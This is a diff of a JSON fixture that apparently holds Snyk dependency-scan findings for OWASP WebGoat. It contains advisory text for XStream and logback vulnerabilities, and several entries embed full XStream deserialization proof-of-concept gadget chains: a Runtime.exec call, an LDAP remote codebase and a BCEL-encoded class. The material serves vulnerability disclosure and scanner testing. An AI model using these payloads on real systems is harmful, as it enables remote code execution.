\u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjavax.swing.event.EventListenerList serialization='custom'\u003e\r\n  \u003cjavax.swing.event.EventListenerList\u003e\r\n    \u003cdefault\u003e\r\n      \u003clistenerList\u003e\r\n        \u003cjavax.swing.undo.UndoManager\u003e\r\n          \u003chasBeenDone\u003etrue\u003c/hasBeenDone\u003e\r\n          \u003calive\u003etrue\u003c/alive\u003e\r\n          \u003cinProgress\u003etrue\u003c/inProgress\u003e\r\n          \u003cedits\u003e\r\n            \u003ccom.sun.xml.internal.ws.api.message.Packet\u003e\r\n              \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n                \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n                \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n                \u003cbodyParts/\u003e\r\n                \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n                  \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n                  \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n                    \u003csoapPart/\u003e\r\n                    \u003cmm\u003e\r\n                      \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                        \u003caliases class='com.sun.jndi.ldap.LdapBindingEnumeration'\u003e\r\n                          \u003ccleaned\u003efalse\u003c/cleaned\u003e\r\n                          \u003centries\u003e\r\n                            \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                              \u003cDN\u003ecn=four,cn=three,cn=two,cn=one\u003c/DN\u003e\r\n                              \u003cattributes class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                                \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                  \u003cdefault\u003e\r\n                                    \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                                  \u003c/default\u003e\r\n                                  \u003cint\u003e4\u003c/int\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003eobjectClass\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003ejavanamingreference\u003c/string\u003e\r\n                                    \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                                    \u003ccom.sun.jndi.ldap.LdapAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003crdn class='com.sun.jndi.ldap.LdapName' serialization='custom'\u003e\r\n                                          \u003ccom.sun.jndi.ldap.LdapName\u003e\r\n                                            \u003cstring\u003ecn=four,cn=three,cn=two,cn=one\u003c/string\u003e\r\n                                            \u003cboolean\u003efalse\u003c/boolean\u003e\r\n                                          \u003c/com.sun.jndi.ldap.LdapName\u003e\r\n                                        \u003c/rdn\u003e\r\n                                      \u003c/default\u003e\r\n                                    \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003ejavaCodeBase\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003ehttp://127.0.0.1:8080/\u003c/string\u003e\r\n                                    \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                                    \u003ccom.sun.jndi.ldap.LdapAttribute\u003e\r\n                                      \u003cdefault/\u003e\r\n                                    \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003c/com.sun.jndi.ldap.LdapAttribute\u003e\r\n                                  \u003ccom.sun.jndi.ldap.LdapAttribute serialization='custom'\u003e\r\n                                    \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                      \u003cdefault\u003e\r\n                                        \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                        \u003cattrID\u003ejavaClassName\u003c/attrID\u003e\r\n                                      \u003c/default\u003e\r\n                                      \u003cint\u003e1\u003c/",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -13778,7 +859,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000033-0000-4000-8000-000000000033",
+          "key": "00000000-0000-0000-0000-000000000005",
           "locations": [
             {
               "package": {
@@ -13789,18 +870,110 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 162
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
+          "problems": [
+            { "id": "CWE-434", "source": "cwe" },
+            { "id": "CVE-2021-39151", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T07:55:15.088252Z",
+              "credits": ["Smi1e"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:20.416887Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:56.830873Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.463896Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:58.805531Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T07:53:09Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.67811",
+                "probability": "0.00573"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:48.463896Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:25.48837Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39151.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-hph2-m3g5-xxv4", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "00000033-0000-4000-8000-000000000033",
+        "id": "00000000-0000-0000-0000-000000000005",
         "links": {},
         "relationships": {
           "fix": {
@@ -13814,11 +987,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -13827,7 +1000,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000033-0000-4000-8000-000000000033",
+              "id": "00000000-0000-0000-0000-000000000005",
               "type": "fixes"
             }
           }
@@ -13837,58 +1010,141 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.\r\n\r\n## PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='sun.tracing.NullProvider'\u003e\r\n        \u003cactive\u003etrue\u003c/active\u003e\r\n        \u003cproviderType\u003ejava.lang.Comparable\u003c/providerType\u003e\r\n        \u003cprobes\u003e\r\n          \u003centry\u003e\r\n            \u003cmethod\u003e\r\n              \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n              \u003cname\u003ecompareTo\u003c/name\u003e\r\n              \u003cparameter-types\u003e\r\n                \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n              \u003c/parameter-types\u003e\r\n            \u003c/method\u003e\r\n            \u003csun.tracing.dtrace.DTraceProbe\u003e\r\n              \u003cproxy class='java.lang.Runtime'/\u003e\r\n              \u003cimplementing__method\u003e\r\n                \u003cclass\u003ejava.lang.Runtime\u003c/class\u003e\r\n                \u003cname\u003eexec\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.String\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/implementing__method\u003e\r\n            \u003c/sun.tracing.dtrace.DTraceProbe\u003e\r\n          \u003c/entry\u003e\r\n        \u003c/probes\u003e\r\n      \u003c/handler\u003e\r\n    \u003c/dynamic-proxy\u003e\r\n    \u003cstring\u003ecalc\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39144.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml)\n",
+          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the `logback.xml` configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.5.19 or higher.\n## References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7)\n- [Release Notes](https://logback.qos.ch/news.html#1.5.19)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
+                  "name": "org.springframework.boot:spring-boot-starter-validation",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter-logging",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "ch.qos.logback:logback-classic",
+                  "version": "1.5.18"
+                },
+                { "name": "ch.qos.logback:logback-core", "version": "1.5.18" }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000034-0000-4000-8000-000000000034",
+          "key": "00000000-0000-0000-0000-000000000006",
           "locations": [
             {
               "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
+                "name": "ch.qos.logback:logback-core",
+                "version": "1.5.18"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 866
-            }
-          },
-          "suppression": {
-            "created_at": "2025-11-12T17:28:20.759Z",
-            "expires_at": "2025-11-19T23:00:00Z",
-            "justification": "Just an arbitrary reason :)",
-            "path": [
-              "*"
-            ],
-            "policy": {
-              "id": "00000039-0000-4000-8000-000000000039"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.5.19)"],
+              "created_at": "2025-10-01T12:16:51.884016Z",
+              "credits": ["Unknown"],
+              "cvss_base_score": 5.9,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.9,
+                  "cvss_version": "4.0",
+                  "modified_at": "2025-10-01T12:16:52.160102Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-10-01T12:16:52.160102Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-10-04T19:43:14.046068Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
+              "disclosed_at": "2025-10-01T07:46:31.257Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.11888",
+                "probability": "0.00040"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-CHQOSLOGBACK-13169722",
+              "initially_fixed_in_versions": ["1.5.19"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-10-04T19:43:14.046068Z",
+              "package_name": "ch.qos.logback:logback-core",
+              "package_version": "",
+              "published_at": "2025-10-01T12:16:52.127237Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7"
+                },
+                {
+                  "title": "Release Notes",
+                  "url": "https://logback.qos.ch/news.html%231.5.19"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
             },
-            "status": "ignored"
-          },
-          "title": "Remote Code Execution (RCE)"
+            { "id": "CVE-2025-11226", "source": "cve" },
+            { "id": "CWE-454", "source": "cwe" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 41 } },
+          "title": "External Initialization of Trusted Variables or Data Stores"
         },
-        "id": "00000034-0000-4000-8000-000000000034",
+        "id": "00000000-0000-0000-0000-000000000006",
         "links": {},
         "relationships": {
           "fix": {
@@ -13896,17 +1152,33 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
+                  "package_name": "ch.qos.logback:logback-core",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "name": "org.springframework.boot:spring-boot-starter-validation",
+                          "version": "3.5.7"
+                        },
+                        {
+                          "name": "org.springframework.boot:spring-boot-starter",
+                          "version": "3.5.7"
+                        },
+                        {
+                          "name": "org.springframework.boot:spring-boot-starter-logging",
+                          "version": "3.5.7"
+                        },
+                        {
+                          "name": "ch.qos.logback:logback-classic",
+                          "version": "1.5.20"
+                        },
+                        {
+                          "name": "ch.qos.logback:logback-core",
+                          "version": "1.5.20"
                         }
                       ],
                       "is_drop": false
@@ -13915,43 +1187,9 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000034-0000-4000-8000-000000000034",
+              "id": "00000000-0000-0000-0000-000000000006",
               "type": "fixes"
             }
-          },
-          "policy": {
-            "data": {
-              "attributes": {
-                "policies": [
-                  {
-                    "applied_policy": {
-                      "action_type": "ignore",
-                      "ignore": {
-                        "created": "2025-11-12T17:28:20.759Z",
-                        "disregard_if_fixable": false,
-                        "expires": "2025-11-19T23:00:00Z",
-                        "ignored_by": {
-                          "email": "peter.schafer@snyk.io",
-                          "id": "00000002-0000-4000-8000-000000000002",
-                          "name": "Peter"
-                        },
-                        "path": [
-                          "*"
-                        ],
-                        "reason": "Just an arbitrary reason :)",
-                        "reason_type": "temporary-ignore",
-                        "source": "api"
-                      }
-                    },
-                    "id": "00000039-0000-4000-8000-000000000039",
-                    "type": "legacy_policy_snapshot"
-                  }
-                ]
-              },
-              "id": "0000000c-0000-4000-8000-00000000000c",
-              "type": "policies"
-            },
-            "links": {}
           }
         },
         "type": "findings"
@@ -13959,13 +1197,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'\u003e\r\n                \u003cnames class='java.util.AbstractList$Itr'\u003e\r\n                  \u003ccursor\u003e0\u003c/cursor\u003e\r\n                  \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                  \u003cexpectedModCount\u003e0\u003c/expectedModCount\u003e\r\n                  \u003couter-class class='java.util.Arrays$ArrayList'\u003e\r\n                    \u003ca class='string-array'\u003e\r\n                      \u003cstring\u003e$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A\u003c/string\u003e\r\n                    \u003c/a\u003e\r\n                  \u003c/outer-class\u003e\r\n                \u003c/names\u003e\r\n                \u003cprocessorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'\u003e\r\n                  \u003cparent class='sun.misc.Launcher$ExtClassLoader'\u003e\r\n                  \u003c/parent\u003e\r\n                  \u003cpackage2certs class='hashtable'/\u003e\r\n                  \u003cclasses defined-in='java.lang.ClassLoader'/\u003e\r\n                  \u003cdefaultDomain\u003e\r\n                    \u003cclassloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/\u003e\r\n                    \u003cprincipals/\u003e\r\n                    \u003chasAllPerm\u003efalse\u003c/hasAllPerm\u003e\r\n                    \u003cstaticPermissions\u003efalse\u003c/staticPermissions\u003e\r\n                    \u003ckey\u003e\r\n                      \u003couter-class reference='../..'/\u003e\r\n                    \u003c/key\u003e\r\n                  \u003c/defaultDomain\u003e\r\n                  \u003cpackages/\u003e\r\n                  \u003cnativeLibraries/\u003e\r\n                  \u003cassertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/\u003e\r\n                  \u003cdefaultAssertionStatus\u003efalse\u003c/defaultAssertionStatus\u003e\r\n                  \u003cclasses/\u003e\r\n                  \u003cignored__packages\u003e\r\n                    \u003cstring\u003ejava.\u003c/string\u003e\r\n                    \u003cstring\u003ejavax.\u003c/string\u003e\r\n                    \u003cstring\u003esun.\u003c/string\u003e\r\n                  \u003c/ignored__packages\u003e\r\n                  \u003crepository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'\u003e\r\n                    \u003c__path\u003e\r\n                      \u003cpaths/\u003e\r\n                      \u003cclass__path\u003e.\u003c/class__path\u003e\r\n                    \u003c/__path\u003e\r\n                    \u003c__loadedClasses/\u003e\r\n                  \u003c/repository\u003e\r\n                  \u003cdeferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/\u003e\r\n                \u003c/processorCL\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called des",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'\u003e\r\n                \u003cnames class='java.util.AbstractList$Itr'\u003e\r\n                  \u003ccursor\u003e0\u003c/cursor\u003e\r\n                  \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                  \u003cexpectedModCount\u003e0\u003c/expectedModCount\u003e\r\n                  \u003couter-class class='java.util.Arrays$ArrayList'\u003e\r\n                    \u003ca class='string-array'\u003e\r\n                      \u003cstring\u003eEvil\u003c/string\u003e\r\n                    \u003c/a\u003e\r\n                  \u003c/outer-class\u003e\r\n                \u003c/names\u003e\r\n                \u003cprocessorCL 